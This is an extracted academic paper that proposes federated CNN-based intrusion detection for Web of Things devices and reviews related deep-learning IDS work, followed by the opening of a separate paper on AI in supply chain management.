Deep Learning for Intrusion Detection in WoT Abdelaziz Laaychi(B) , Mariam Tanana, Bochra Labiad, and Abdelouahid Lyhyaoui Laboratory of Innovative Technologies (LTI), National School of Applied Sciences of Tangier, Abdelmalek Essaâdi University, Tetouan, Morocco {abdelaziz.laaychi,bochra.labiad}@etu.uae.ac.ma {mtanana,a.lyhyaoui}@uae.ac.ma Abstract. The Web of Things (WoT) is an evolution of the Internet of Things (IoT). The main objective of WoT is to connect all smart devices via the Internet so that they can share services and resources globally. But this increase in connectivity makes devices vulnerable to different types of cyber-attacks that affect the normal functioning of smart devices and leak private information. The detection and prevention of cyberattacks in WoT is therefore an important research issue. In this paper, we proposed a deep learning approach based on Convolutional Neural Networks (CNN) for intrusion detection in WoT environment. Keywords: WoT

1

· IoT · Security · Deep learning

Introduction

The Internet of Things (IoT) provides the platform through which different smart devices can exchange data. To exchange this information, IoT devices use the Internet as a medium and different types of protocols such as IEEE 802.15.4, 6LoWPAN, etc. The main purpose of these protocols is to transfer data at low cost and low power. However, IoT devices do not have a direct global connectivity, hence the introduction of the Web of Things (WoT) concept. The WoT standard is established by the W3C consortium [1] so that IoT devices can connect to all other IoT devices, regardless of their geographical location, through the web. WoT standards are still in the development phase and researchers have proposed different standards for them. Many researchers have defined the architecture of WoT [2]. In general, we can divide the WoT architecture into four layers, see Fig. 1, explained as follows: – Reachability layer: The main purpose of this layer is to connect the physical IoT devices to the Internet through different web protocols such as HTTP, REST API, CoAP, etc. – Search/Execution Layer: This layer provides interpretability, smooth connectivity, etc. So that it is easy to find the corresponding IoT device. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 272–281, 2023. https://doi.org/10.1007/978-3-031-35251-5_26

Deep Learning for Intrusion Detection in WoT

273

– Sharing/Proxy Layer: This layer is responsible for security and privacy of IoT devices in the WoT environment. – Composition layer: This is the highest layer in the WoT architecture. This layer connects users to the WoT environment.

Fig. 1. The WoT architecture [3]

Devices in the WoT environment have limited computing power. They manipulate users’ personal and private information, which makes them very vulnerable devices. In this context, we proposed a deep learning-based security model for intrusion detection in the WoT environment. According to [4], a deep learning model is first trained with the data from the network in question. It learns the distributions of the different classes (i.e., benign and malicious traffic) and, in testing, we determine how well it can discriminate between classes, reverting to training and adjusting hyperparameters if its performance was suboptimal. The training and testing cycle continues, and experimentation with different models and architectures continues, until the best model is ready for deployment. During deployment, the model intercepts traffic and generates predictions about whether a packet is normal or suspicious; in the latter case, the system administrator is notified, or the packet may be automatically blocked. The rest of the paper is organized as follows: Sect. 2 represent the literature review, Sect. 3 gives the insight of our proposed approach and finally, Sect. 4 concludes the paper.

274

2

A. Laaychi et al.

Related Work

The massive growth in data transmission via various IoT and WoT communication devices and protocols has increased security concerns, highlighting the need for effective IDS. In this section, we reviewed the latest security methods that use deep learning techniques, and compared their performance. Gaurav et al. [5] proposed a Deep-learning-based approach for the detection of different cyber attacks like DoS, U2R, R2L in the WoT devices. The author used the KDDCUP99 dataset for evaluating the proposed approach and for comparing the proposed approach with the other machine learning techniques. The proposed approach detects the attack features in the WoT environment from the incoming traffic through a deep learning model and then blacklists the malicious IP addresses so that only legitimated traffic can pass through the WoT environment. Apostol et al. [6] propose an IoT botnet anomaly detection solution based on a deep autoencoder model. The proposed model uses unsupervised deep learning techniques to identify IoT botnet activities. An empirical evaluation of the proposed method is conducted on balanced and unbalanced datasets to evaluate its threat detection capability. The reduction in false positive rate and its impact on the detection system are also analyzed. In addition, a comparison with other unsupervised learning approaches is included. Chatterjee et al. [7] propose a probabilistic hybrid ensemble classifier (PHEC) in IoT security in centralized settings, then they adapt it to a federated learning framework that performs local training and aggregates only the model parameters. Then they propose Noise-Tolerant PHEC in centralized and federated settings to solve the label-noise problem. The proposed idea uses classifiers using weighted convex substitution loss functions. Natural robustness of KNN classifier towards noisy data is also used in the proposed architecture. The author has used four datasets, namely ‘NSL-KDD’, ‘DS2OS Traffic Traces’, ‘Gas Pipeline Dataset’ and ‘Water Tank Dataset’. The experimental results show that their model achieves high TPR while keeping low FPR on clean and noisy data. They also demonstrate that the hybrid ensemble models achieve performance in federated settings close to that of the centralized settings. Ferrag et al. [8] compare federated deep learning approaches for cybersecurity in IoT applications. They analyzed federated learning-based security and privacy systems for several types of IoT applications. Then, they provided an experimental analysis of federated deep learning with three deep learning approaches, namely RNN, CNN and DNN. For each deep learning model, they investigated the performance of centralized and federated learning under three IoT traffic datasets, namely the Bot-IoT dataset, the MQTTset dataset, and the TON_IoT dataset. The results demonstrate that federated deep learning approaches can outperform the classic/centralized versions of machine learning (non-federated learning) in assuring the privacy of IoT device data and provides the highest accuracy in attack detection. Aversano et al. [9] combine five different anomalous IoT traffic datasets and evaluate them with a deep learning approach capable of identifying normal and

Deep Learning for Intrusion Detection in WoT

275

malicious IoT traffic as well as different types of anomalies. The deep learning approach has been enriched with an appropriate hyperparameter optimization phase, a feature reduction phase using an autoencoding neural network, and a robustness study of the best deep neural networks considered in situations affected by Gaussian noise on some of the considered features. The obtained results demonstrate the effectiveness of the created IoT dataset for anomaly detection using deep learning techniques, also in a noisy scenario. Ullah et al. [10] design and develop an anomaly-based intrusion detection model for IoT networks. First, a convolutional neural network model is used to create a multiclass classification model. The proposed model is then implemented using 1D, 2D and 3D convolutional neural networks. The proposed convolutional neural network model is validated using the BoT-IoT, IoT Network Intrusion, MQTT-IoT-IDS2020 and IoT-23 intrusion detection datasets. Transfer learning is used to implement binary and multiclass classification using a pre-trained multiclass convolutional neural network model. A comparison is made between the proposed binary and multiclass classification models, and existing deep learning implementations, in terms of accuracy, precision, recall and F1 score. Mustafizur Rahman Shahid [11] develops an IoT NIDS based on unsupervised learning, specifically anomaly detection algorithms. This allows his model to detect new types of attacks. He also explores two different situations, depending on whether it is possible to know which device is generating the network traffic. To this purpose, he proposes to detect anomalous communications in IoT networks using a set of sparse autoencoders, which are unsupervised neural networks that can be used for anomaly detection thereby allowing the detection of new types of attacks. Khalid Aldriwish [12] proposes an IoT security architecture based on deep learning approach to detect malware across the IoT network. The malware model is based on Deep Convolutional Neural Networks (DCNNs). TensorFlow Deep Neural Networks (TFDNNs) are introduced to detect software piracy threats based on source code plagiarism. The investigation is conducted on the Google Code Jam (GCJ) dataset. Susilo et al. [13] developed an algorithm to detect denial of service (DoS) attacks using a deep learning algorithm. They used the Python programming language with packages such as scikit-learn, Tensorflow and Seaborn. They found that a deep learning model could increase accuracy so that mitigating attacks that occur on an IoT network is as effective as possible. Kim et al. [14] developed a framework based on ML and DL to detect IoT botnet attacks and then detected botnet attacks targeting various IoT devices using this framework. Their framework consists of the N-BaIoT botnet dataset, botnet training model, and botnet detection model. Alotaibi et al. [15] propose a deep learning method to detect malicious traffic data, especially malicious attacks targeting IoT devices. The proposed stacked deep learning method is bundled with five pre-trained residual networks (ResNets) to deeply learn the characteristics of suspicious activities and distinguish them from normal traffic. Each pre-trained ResNet model is composed of

276

A. Laaychi et al.

10 residual blocks. They used two large datasets to evaluate the performance of their detection method. They investigated two heterogeneous IoT environments to make their approach deployable in any IoT environment. The proposed method has the ability to distinguish benign and malicious traffic data and detect most IoT attacks. Xiao et al. [16] propose a novel behavior-based deep learning framework (BDLF) that is built on a cloud platform to detect malware in an IoT environment. In the proposed BDLF, they first construct behavior graphs to provide efficient information about malware behaviors using extracted API calls. They then use a neural network-Stacked AutoEncoders (SAEs) to extract high-level features from the behavior graphs. The layers of the SAEs are inserted one after another and the last layer is connected to some added classifiers. The architecture of SAEs is 6,000-2,000-500. The experimental results show that the proposed BDLF can learn the semantics of high-level malicious behaviors from the behavior graphs and increase the average detection accuracy by 1.5%. Sagduyu et al. [17] present new techniques based on adversarial machine learning and apply them to three types of over-the-air (OTA) wireless attacks, namely the jamming denial-of-service (DoS) attack, the spectrum poisoning attack, and the priority violation attack. They show that these attacks with different levels of energy consumption and stealth result in significant loss of throughput and success rate in wireless communications for IoT systems. Then, they introduce a defense mechanism that systematically increases the adversary’s uncertainty at the inference stage and improves performance. The results provide new insights into how to attack and defend IoT networks using deep learning. Dawoud et al. [18] propose a secure framework for IoT based on SDN. The framework is a generalization for the integration of SDN and IoT. They focus on massive IoT deployment, e.g., smart city applications, where security is critical and network traffic is huge. The study looks at SDN architecture from a security perspective. They deploy a Deep Learning (DL) based intrusion detection system. The detection module uses Restricted Boltzmann Machines (RBM). The precision rate shows significant improvements over standard ML, e.g. SVM and PCA. Fatani et al. [19] propose an efficient AI-based mechanism for intrusion detection systems (IDS) in IoT systems. They exploit advances in deep learning and metaheuristic (MH) algorithms that have approved their effectiveness in solving complex engineering problems. They propose a feature extraction method using convolutional neural networks (CNNs) to extract relevant features. They also develop a feature selection method using a variant of the transient search optimization (TSO) algorithm, called TSODE, which uses the operators of the differential evolution (DE) algorithm. The proposed TSODE uses differential evolution to improve the balancing process between the exploitation and exploration phases. In addition, they use three public datasets, KDDCup-99, NSLKDD, BoT-IoT, and CICIDS-2017 to evaluate the performance of the developed method.

Deep Learning for Intrusion Detection in WoT

277

In the table above we compare the related work approaches in terms of the followings statistical parameters: – Accuracy: It is a parameter that represents the performance of a system, A high accuracy value means that the system is working properly. – Recall: It indicates the sensitivity of the system. If the recall value is high, it means that the system is sensitive to the labeled items and identifies them correctly. – Precision: It indicates the amount of accuracy with which a system identifies legitimate and malicious packets. The higher the accuracy value, the greater the likelihood that the system is working correctly. – F1-Score: It is the measure of the global performance of the system (Table 1).

Table 1. Comparative analysis of existing IDS for IoT & WoT. Paper Technique

Dataset

Accuracy Recall

Precision F1-score

[5]

DNN

- KDDCUP99.

99.73%

97%

96%

97%

[6]

Deep autoencoder model.

- Bot-IoT

99.7%

99%

99%

N/A

[7]

Probabilistic hybrid - NSL-KDD ensemble classifier - DS2OS traffic traces (PHEC) adapted to a - Gas pipeline dataset federated learning framework - Water tank dataset

83.78%

N/A

83.92%

N/A

98.27% 98.47% 93.74%

N/A N/A N/A

61.5% 98.99% 82.34%

75.49% 98.22% 89.24%

[8]

Federated deep learning with RNN Federated deep learning with CNN Federated deep learning with DNN

Bot-IoT

96.76%

97%

95%

96%

MQTTset TON_IoT Bot-IoT

89.29% 99.98% 966.02%

89% 100% 93%

90% 100% 97%

90% 100% 95%

MQTTset TON_IoT Bot-IoT

89,77% 98.87% 95.76%

89% 100% 96%

90% 100% 94%

90% 100% 95%

MQTTset TON_IoT

90.06% 99.68%

89% 100%

91% 100%

90% 100%

N/A

N/A

[9]

DNN autoencoding neural network

- NSL-KDD

99.89%

N/A

[10]

CNN

- BoT-IoT - IoT network intrusion - MQTT-IoT-IDS2020 - IoT-23 intrusion detection

99.97% 97.76%

99.95% 99.95% 97.8% 97.76%

99.95% 97.78%

99.93% 99.96%

99.92% 99.93% 99.97% 99.96%

99.92% 99.96% N/A

[11]

Unsupervised learning N/A algorithms (autoencoders)

N/A

N/A

[12]

DCNN, TFDNN

98.12%

97.88% 98.02%

- Google Code Jam (GCJ) dataset

N/A

N/A

(continued)

278

A. Laaychi et al. Table 1. (continued) Paper Technique

3

Accuracy Recall

Precision F1-score

[13]

Random Forests - BoT-IoT (RF), CNN, Multilayer Perceptron (MLP)

Dataset

91.15%

N/A

N/A

N/A

[14]

CNN, RNN, LSTM

N/A

N/A

N/A

91%

[15]

Stacked deep learning - N-BaIoT.- power system dataset

97.9%

N/A

N/A

N/A

[16]

- Behavior-based deep N/A learning framework (BDLF) Neural network-Stacked AutoEncoders (SAEs)

N/A

99.2%

98.6%

98.9%

[17]

Adversarial deep learning

N/A

N/A

N/A

N/A

N/A

[18]

RBM

- KDD99

94%

N/A

94%

[19]

CNNTSODE feature selection

- KDDCup-99

82.783%

85.79% 84.640%

83.10%

- NSL-KDD - BoT-IoT - CICIDS-2017

66.092% 98.942% 99.750%

69.10% 68.913% 98.97% 98.941% 99.10% 99.320%

61.94% 98.94% 99.48%

N-BaIoT

N/A

Proposed Work

The CNN has the capability to automatically learn better features and categorize traffic [20]. In additional, it can perform better classification and learn additional features with more traffic data, as it shares the same convolution matrix (kernel), which would reduce the number of parameters and the sum of learning computations significantly. This allows CNN to quickly recognize the nature of attacks, unlike other ML or DL algorithms that may be overfitted with massive data. Furthermore, the use of CNNs in the field of intrusion detection performs better than other algorithms. The core concept of federated learning is to create machine learning models that are built on distributed datasets across different devices while avoiding the leakage of data [8]. Specifically, federated learning is a new technique where the current model is downloaded and an updated model is computed on IoT devices using the local IoT data. These locally trained models are then returned from the IoT devices to the central server for aggregation, (e.g., the weights are averaged) and then a combined and enhanced single global model is returned to IoT devices. The distribution of data is important in terms of federated learning deployment and the associated practical and technical challenges.

Deep Learning for Intrusion Detection in WoT

279

In the following, we will present our solution, based on four steps: 1. 2. 3. 4.

Every device train the generic model with the local private data; Every device uploads its local model parameters; The server aggregates all local models to get the global model; Every device downloads the global model.

We train a deep federated learning-based IDS models for cyber attack detection in WoT. In each device a CNN-based model is trained on a local dataset. Then these trained models are aggregate in a central server, next, each device downloads the global model, see Fig. 2.

Fig. 2. Proposed architecture.

According to literature reviews, the federated approach has proven to be sufficient in terms of data security, as devices can train their model with their own data, thus avoiding sharing private data on the Internet. Furthermore, by using the CNN technique as a deep learning model, we expect to obtain a powerful model. In future work, we will train our model with a different datasets and compare it with other methods.

280

4

A. Laaychi et al.

Conclusion

The WoT provides the environment through which each IoT device can connect to other IoT devices via the Internet, but along with the benefits of global service and data exchange, it has some limitations. As it manipulates users’ personal and private information, it therefore has various attack vectors, and with lowpower and low-memory IoT devices, it is difficult to counter these cyber-attacks. In this context, we provide a security model based on federated learning and CNN. And in the next work, we aim to train and test our model on different datasets, to evaluate its capabilities.

References 1. Web of Things (WoT) Architecture. https://www.w3.org/TR/wot-architecture/. Accessed 14 Apr 2022 2. Faheem, M.R., Anees, T., Hussain, M.: The web of things: findability taxonomy and challenges. IEEE Access 7, 185:028–185:041 (2019) 3. Guinard, D.D., Trifa, V.M.: Building the web of things (2017) 4. Tsimenidis, S., Lagkas, T., Rantos, K.: Deep Learning in IoT Intrusion Detection. J. Netw. Syst. Manag. 30(1), 1–40 (2021). https://doi.org/10.1007/s10922-02109621-9 5. Akshat, G., Gupta, B., Ching-Hsien, H., Dragan, P., Francisco, J.: Deep learning based approach for secure Web of Things (WoT). In: IEEE International Conference on Communications Workshops (ICC Workshops) (2021). https://doi.org/10. 1109/ICCWorkshops50388.2021.9473677 6. Apostol, I., Preda, M., Nila, C., Bica, I.: IoT botnet anomaly detection using unsupervised deep learning. Electronics 10, 1876 (2021). https://doi.org/10.3390/ electronics10161876 7. Chatterjee, S., Manjesh, K.: Federated learning for intrusion detection in IoT security: a hybrid ensemble approach (2021) 8. Ferrag, M., Friha, O., Maglaras, L., Janicke, H., Shu, L.: Federated deep learning for cyber security in the internet of things: concepts, applications, and experimental analysis. IEEE Access (2021). https://doi.org/10.1109/access.2021.3118642 9. Aversano, L., Bernardi, M., Cimitile, M., Pecori, R., Veltri, L.: Effective anomaly detection using deep learning in IoT systems. Hindawi Wirel. Commun. Mob. Comput. 2021, Article ID 9054336, 14 (2021). https://doi.org/10.1155/2021/9054336 10. Ullah, I., Qusay, H.: Design and development of a deep learning-based model for anomaly detection in IoT networks. IEEE Access (2021). https://doi.org/10.1109/ access.2021.3094024 11. Shahid, M.: Deep learning for internet of things (IoT) network security. A thesis submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy. Telecom SudParis Institut Polytechnique de Paris, France, March 2021 12. Aldriwish, K.: A deep learning approach for malware and software piracy threat detection. Eng. Technol. Appl. Sci. Res. 11(6), 7757–7762 (2021). https://doi.org/ 10.48084/etasr.4412 13. Susilo, B., Sari, R.: Intrusion detection in IoT networks using deep learning algorithm. Information (Switzerland) Published by MDPI. Information 11, 279 (2020). https://doi.org/10.3390/info11050279

Deep Learning for Intrusion Detection in WoT

281

14. Kim, J., Shim, M., Hong, S., Shin, Y., Choi, E.: Intelligent detection of IoT botnets using machine learning and deep learning. Appl. Sci. Published by MDPI. 10, 7009 (2020). https://doi.org/10.3390/app10197009 15. Alotaibi, B., Alotaibi, M.: A stacked deep learning approach for IoT cyberattack detection. Hindawi J. Sens. 2020, Article ID 8828591, 10 p. (2020). https://doi. org/10.1155/2020/8828591 16. Xiao, F., Lin, Z., Sun, Y., Ma, Y.: Malware detection based on deep learning of behavior graphs. Hindawi Math. Probl. Eng. 2019, Article ID 8195395, 10 p. (2019). https://doi.org/10.1155/2019/8195395 17. Sagduyu, Y., Shi, Y., Erpek, T.: IoT network security from the perspective of adversarial deep learning. In: 16th Annual IEEE International Conference on Sensing, Communication, and Networking (SECON) (2019). https://doi.org/10.1109/ SAHCN.2019.8824956 18. Dawoud, A.: Deep learning and software-defined networks: towards secure IoT architecture. Internet Things (2018). https://doi.org/10.1016/j.iot.2018.09.003 19. Fatani, A., Abdelaziz, M., Dahou, A., Mohammed, A., Al-qaness, A., Lu, S.: IoT intrusion detection system using deep learning and enhanced transient search optimization (2016) 20. Idrissi, I., Azizi, M., Moussaoui, O.: IoT security with deep learning-based intrusion detection systems: a systematic literature review. In: 4th International Conference on Intelligent Computing in Data Sciences (ICDS) (2020). https://doi.org/ 10.1109/ICDS50568.2020.9268713

Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges Ikram Lebhar1(B) , Afaf Dadda1 , and Latifa Ezzine2 1 ENSAM School of Engineering, Meknes, Morocco

[email protected], [email protected] 2 University Moulay Ismail, Meknes, Morocco

Abstract. Organizations are seeking to improve their management systems in a period of economic industrialization in which the environment is becoming increasingly competitive and widespread. In the industry 4.0 era, most businesses strive to be reactive and agile by incorporating new technologies such as artificial intelligence (AI) in supply chain management. Nowadays, Supply chains (SC) differ from those of just a few decades ago, and they are evolving in a highly competitive economic system. Dynamic supply chain processes require a technology that can cope with their increasing complexities. Moreover, quality user stories, budget control, and a firm’s agility in the light of economic opportunities and uncertainties are all dependent on supply chains. The only way of increasing operational efficiency is to use the right technology at the right time. In recent years, several functional supply chain applications based on artificial intelligence (AI) have emerged. Artificial intelligence has the potential to significantly improve the performance of the overall economy. However, it could have a greater influence by serving as a method of invention that can revolutionize the nature of the process of innovation in SC and R&D institutions. The main purpose of this paper is to identify the critical role of AI technology in providing greater flexibility and control to supply chain processes, and also to bring light to SC reaction between its benefits and challenges. Keywords: Artificial intelligence (AI) · New technologies · Supply chain management (SCM)

1 Introduction Supply chains are critical to providing high-quality customer experiences, controlling costs, and maintaining a company’s agility in the face of market opportunities and unpredictability. Firms attempt speed, dependability, and traceability while considering cost obligations, time constraints, and inventory optimization [1]. According to Mentzer [2], “a supply chain is the network of organizations that are involved, through upstream and downstream linkages, in the different processes and activities that produce value in the form of products and services delivered to the ultimate consumer.” Supervision, forecasting, and optimization are required to create more © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 282–295, 2023. https://doi.org/10.1007/978-3-031-35251-5_27

Artificial Intelligence Applications in the Global Supply Chain

283

agile and resilient processes, and activities and to perform properly in the challenging situations of supply chain. Therefore, AI enables users to identify patterns in the supply chain and integrate predictive perspectives that permit faster assessment and more appropriate mitigation of disruptive events that may occur across the supply chain. AI can easily recognize relevant SC data, allowing managers to improve models that help in understanding how each system operates and identify opportunities for improvement [3]. Also, it enables systems to make resourceful decisions and execute tasks automatically without human intervention. This paper reports a research project that aims to address the following question: How can artificial intelligence help the global supply chain issues? What are the risks and challenges that could be faced by companies in the fields of this digital transformation? First of all, we define AI and develop its evolution from the past, the present, and the future. On the Second hand, we ought to attempt the applications of AI in supply chain management starting from demand forecasting to distribution to get the paper in-depth details. Then, we move to the risks and negative effects that AI could have in the industry field. The paper is concluded by suggesting opportunities and new ideas for future research.

2 Understanding of Artificial Intelligence Technology 2.1 Definition and History Artificial intelligence is the science that makes computer operates smart tasks that only human could previously perform [4]. It has advanced rapidly in the last decade, and it has altered people’s beliefs and lifestyles. Technology innovation is becoming a key development strategic approach for countries all over the world, in order to improve competitiveness and ensure security. To be a leader in a novel round of global competition, several countries have introduced incentive programs and enhanced the implementation of innovative aspects and abilities. AI has emerged as a research center point in science and engineering; huge organizations such as Microsoft, Siemens, and Google are investing in AI and adapting it to an increasing number of fields [8]. AI has a long history, dating back several decades when scientists debated whether artificial creatures, manufactured men, and other autonomous systems existed or might exist in some form [5]. It became more real as a result of early researchers during the 1700s or even beyond. Thinkers pondered how smart robots may artificially automate and manipulate human thought. The mental processes that sparked interest in AI began when ancient mathematicians, philosophers, statisticians, and theorists investigated the mechanical manipulation of symbols, likely contributing to the 1940s discovery of the programmable digital computer “Atanasoff Berry Computer” (ABC). This particular innovation sparked experts’ interest in developing a new idea “electronic brain”. It took nearly a decade when AI symbols contributed to the comprehension of the industry we have presently. Alan Turing, a mathematician, suggested a test that examined a machine’s capacity to reproduce human activities to the point that they were

284

I. Lebhar et al.

unrecognizable from human action. Later that century, and during a summer conference at Dartmouth College in the mid-1950s, John McCarthy, the computer and cognitive researcher, invented the term “artificial intelligence” [6]. Many experts, logicians, and programmers contributed to the current interpretation of artificial intelligence as a whole from the 1950s onward [5, 7]. Every new decade brought new discoveries and inventions that altered people’s basic understanding of the area of artificial intelligence and also how previous achievements have pushed AI from an impossible ideal to a real world for coming generations. During the last 60 years, artificial intelligence has encountered along improvement process. Its evolution could be divided into different phases: – Native Algorithms: the building blocks of Artificial Intelligence and it refers to a set of rules or instructions that computers can follow. – Machine Learning: “algorithms that can learn from data without relying on rulesbased programming” (McKinsey & Co.) – Deep Learning: a type of machine learning that involves the deployment of a preprogrammed artificial neural network. – Deep Reinforcement: a branch of machine learning that involves training artificial intelligence models in a very specific way. It refers to methods that enable an agent to learn to choose which action to take on its own, in order to maximize his overall reward. – Distributed Agents Artificial intelligence: branch of AI whose goal is to create decentralized systems, usually multi-agent systems, that can cooperate and coordinate (Fig. 1).

Fig. 1. AI evolution from native algorithms to distributed agents

2.2 Enabling Drivers and Technologies of Artificial Intelligence There are numerous Artificial Intelligence-related technologies and subfields, each with its own branch of engineering and scientific study. The most relevant concepts are as follows:

Artificial Intelligence Applications in the Global Supply Chain

285

2.2.1 Natural Language Processing NLP NLP is a branch closely related to the linguistic domain, the objective is to describe what the operator tends to mean when he makes a command, asks a question, or indicates a statement and what he wants to realize [9]. The robot is fully equipped with voice recognition and grammatical knowledge technology, which aims to optimize the algorithm in continuous learning, allowing the engine to hear, connect, and understand the accurate meaning and also emotions [10]. 2.2.2 Deep Learning Deep learning is an AI subfield that employs massive neural networks with many layers of blocks to learn complicated patterns in huge amounts of data [11], taking advantage of advances in computing power and managing to improve training methods. Image and speech recognition are two common applications. 2.2.3 Robotics Robotics is the field of study concerned with the architecture, production, and use of robots. It focuses on the relationship between human-robot interaction and object manufacturing. Robots were originally made to accomplish repetitive tasks such as constructing automobiles on an assembly line), but they’ve since evolved to complete tasks with extremely complex surgeries [12]. Every robot has a different level of independence, ranging from completely bots that take actions with no external influences to human-controlled bots that perform functions that a human has complete control over. 2.2.4 Machine Learning According to Artificial Intelligence, Machine Learning is the practice that attempts to guide a system to gain knowledge and connect data in the same way that a human might. ML is based on the use of an algorithm that helps to improve its effectiveness by gathering and analyzing data [13]. Projection, cluster analysis, categorization, and dimension reduction are the major kinds of issues that require machine learning to solve [14]. 2.2.5 Computing Vision Computer vision aims to assist computers and seeks to empower the recognition and understanding of the statement through a vision in the same way that humans do. It primarily relies on algorithms to detect and examine images and data. Face and image detection are the most widely used computer visions [15]. 2.2.6 Big Data Big Data can be defined as a prerequisite for AI with a large volume of data that develops recognition rate and accuracy. Having a large amount of structured data makes the data more comprehensive and sufficient to support the development of AI as it is critical for achieving goals in machine learning and also the Business Intelligence analysis [16, 17].

286

I. Lebhar et al.

3 Benefits of Artificial Intelligence in Supply Chain Management: Optimal and effective supply chain coordination is great if business units come together to accomplish it. Nevertheless, several obstacles prevent in the way of significant progress in this area. Supply chain models have four key qualities that AI is based on: optimization, prediction, modeling /simulation and decision-making assistance. Each of these characteristics can be enhanced using artificial intelligence techniques. The global supply chain’s machines, robots, IoT, and applications generate a flood of data from multiple sources. As a result, advanced artificial intelligence (AI) and machine learning have emerged, aimed at making sense of all this data and turning it into insights that help for the industry. The problem of all this data is brought under control by AI-powered supply chain technologies. The advantages of using AI to analyze complex operational data are evident: better supply chain accessibility, increased flexibility, shorter cycle times, forecasting big data analysis, quality improvements, high efficiency, faster decision-making, increased supply chain resilience, and the ability to develop processes derived from real perspectives into application performance (Fig. 2). 3.1 Artificial Intelligence and Forecast Demand Optimization Artificial intelligence has been used successfully in demand forecasting. This represents one of the most promising applications of AI in supply chains. Firms are currently striving to strike a balance between supply and demand. As a result, a more accurate prediction for its supply chain and manufacturing is required. AI can process, analyze, automate, and predict data, it can consequently provide consistent and accurate demand forecasting, allowing organizations to better manage their procurement in terms of purchases and order processing, lowering costs associated with transportation, inventory, and other specific advantages. The performance of AI for demand forecasting leads to significant supply chain benefits: Machine learning algorithms look at the historical data, learn and develop accurate predictions over time Customer satisfaction is reduced when there are stockouts, however, it is higher when the product is available anytime. Using AI in demand forecasting improves customer loyalty and brand perception. For retail companies, cash-in-stock is a regular scenario, some products remain unsold for longer than envisaged. This situation results in higher-than-expected inventory expenses, as well as an increased chance that these goods would be sold or become obsolete and lose their value. Such circumstances can be avoided with precise demand forecasting.

Artificial Intelligence Applications in the Global Supply Chain

287

Fig. 2. Integration success factors of AI in SCM

Accurate forecasts allow the employee to focus on the key strategic concerns instead of firefighting in order to manage unpredictable demand fluctuations by reducing or increasing inventories and headcount. AI and machine learning technologies use near-real-time data on variables including marketing campaigns, prices, and local weather forecasts in addition to historical sales data and supply chain setup [18]. Otto, a German online retailer, was able to minimize its inventories by 90% using the same application technology [19]. AI is also being

288

I. Lebhar et al.

employed in R&D departments to swiftly determine if a model is likely to succeed or fail in the market, and if it is, what are the reasons. Moreover, it produces more modern systems by removing waste from the design process. AI has played a significant role in demand forecasting and smart manufacturing in general [20]. 3.2 Artificial Intelligence Between Manufacturing and Smart Manufacturing AI has played a vital role in manufacturing since it optimizes assets and processes, develops the top teams (humans and robots), increases quality and dependability, and reduces downtime for maintenance. Robotics, among the most evolved disciplines of AI, has becoming increasingly important in manufacturing [18]. Innovations in pattern recognition and semantic segmentation systems have revolutionized robot behavior, especially in terms of how they recognize the qualities of the materials and objects with which they interact. The innovative camera-equipped, AI-enhanced robots have been equipped to identify empty shelf space. This results in a significant slight edge over traditional methods for choosing items [21]. Logistics using artificial intelligence unsupervised learning engines for dynamics enable robots to incorporate disturbances into their movement patterns. This intelligent control more precise fixes and an overall increase in process resilience [22]. In addition, because of the current format of the digital factory, it is required to construct a smart factory in order to update the manufacturing industry. Smart factories use a combination of physical and cyber technology to extensively link previously independent distinct processes, making the technologies engaged more complicated and accurate than they are presently [23]. The impact of Artificial Intelligence (AI) on smart manufacturing is quickly growing. The AI-based web accessibility application allows users to create and publish live code, computations, graphics, and explanatory text documents, and it also supports data cleaning process and conversion, simulation analysis, mathematical modeling, machine learning, and many other technologies. Siemens’ industry is the best example of smart manufacturing. Electronics businesses can handle the limitations of industry 4.0 using smart manufacturing. Physical prototypes, disconnected systems, paper-based work instructions, and information silos are all eliminated by Siemens solutions, which allow a continuous flow from research to implementation and beyond [24], resulting in improved industrial processes at both particular sites and global entities. Through a digital factory that simulates the production line, the operator controls and manages the manufacturing of programmable logic circuits. Products interact with the robots that produce them via barcodes, and the robots communicate with one another to refill parts and detect errors [21]. In brief, artificial intelligence has reduced costs of manufacturing, reduced waste, and accelerated time to market [25]. It has been proven that the use of collaborative intelligent machines, machine learning algorithms, and self- driving trucks may minimize warehousing costs and develop inventory levels. Moreover, collaborative agility is a crucial element of AI-enabled production in a smart factory. Agile new ways of working are being implemented in projects using new exponential technologies to develop m ore advanced capabilities as selfservice business intelligence or predictive analytics

Artificial Intelligence Applications in the Global Supply Chain

289

based on Machine Learning and automation [26]. Intelligent agile Robots are now collaborating with people to mass create products, which is critical for customer-centric businesses. AI has assisted factories all around the world in creating more interconnected and coordinated supply chains and value chains [27]. 3.3 Artificial Intelligence and Warehousing Despite the benefits of warehousing, the increasing demands and challenges in it have rendered traditional warehousing operations unsuitable with the seamless and easy handling of the items and cargo held in it. As a result, the warehouse operation must be altered. Several studies have been conducted to ensure the smooth operation of logistics systems, including the use of the internet of things, cloud computing, wireless sensor networks, RFID, tag readers, drones, robots, and artificial intelligence, among other things, to speed up the process in the warehouse, helping to ensure the effective storage and retrieval of products, as well as the warehouse’s efficient functioning (Fig. 3).

Fig. 3. Warehouse incorporated functions

The automation of the above process in warehouse logistics employing the Internet of Things, artificial intelligence, sensor networks, and cloud computing could improve the quality of service by allowing them to avoid incorrect order placement and increase product handling performance. The magnetic sensor in the platform guarantees that the entire quantity of products loaded in the warehouse is accurate, the Rfid allows tag readers to define the nature of items received, and the barcode ensures that the commodities are diverse.

290

I. Lebhar et al.

The intelligent machine gets the output first from sensors, tag readers, then barcode scanners to identify types of goods and act as fully independent tuggers and forklifts to load them in the adequate shelves, the sensors made to fit rack informing the count over Wi-Fi to the nearest computer to be supervised by laborers and the production plant, and also the THINKSPEAK cloud [28]. To provide clients with information about stock availability. When a customer places an order for a specific type of product, the order and tracking number are provided to them. The customer’s information is reported to the warehouse. The order information is sent to the ROBOTS, who determine which item should be retrieved [29]. Path plan is created via optimization algorithm [30] to determine the fastest way to the rack once the type of products is identified. When the robot arrives at its destination, it picks up the requested items and sends the number of order picked up to the operator supervising through Wi-Fi, while sensors in the rack send the number of items left over in the rack to a local Computer, cloud and plant. As a result, the proposed approach informs customers about items in stock and out of stock, as well as the manufacturing unit about products in demand (Fig. 4).

Fig. 4. Warehouse proposed automated system

